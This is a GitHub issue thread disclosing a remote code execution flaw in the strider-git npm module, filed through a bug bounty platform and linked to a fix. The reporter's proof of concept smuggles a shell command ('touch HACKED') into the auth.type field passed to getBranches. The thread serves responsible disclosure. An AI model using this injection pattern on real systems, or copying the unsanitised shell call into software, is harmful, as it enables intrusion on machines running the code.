Strider-CD / strider-git

Basic git provider

Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #38

Closed huntr-helper closed 4 years ago

huntr-helper commented 4 years ago

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Overview

strider-git allows strider to use any git repository for a project.

The issue occurs because user input is formatted inside a command that will be executed without any check.

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

knownasilya commented 4 years ago

@Mik317 would love to learn more about the issue

knownasilya commented 4 years ago

https://www.huntr.dev/app/bounties/open/1-npm-strider-git

Mik317 commented 4 years ago

Hi @knownasilya :). I reported the issue originally to the NPM team through their HackerOne program, however I opted to disclose it also through the Huntrs platform in order to make sure the issue would have been addressed quickly ;).

Here are the steps to reproduce the issue:

Steps To Reproduce:

1. Create the following PoC file:

```js
// poc.js
var git = require("strider-git/lib");
// auth.type carries the injected shell command
git.getBranches({auth:{type:'ssaas;touch HACKED; ', privkey:'sss'}, url:'http://sss'}, '', function(){})
```

2. Check there aren't files called HACKED.
3. Execute the following commands in another terminal:

```sh
npm i strider-git # Install affected module
git init # Initialize as *git* dir
node poc.js # Run the PoC
```

4. Recheck the files: now HACKED has been created :)

Regards, Mik

huntr-helper commented 4 years ago

🛠️ A fix has been provided for this issue. Please reference: https://github.com/418sec/strider-git/pull/1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.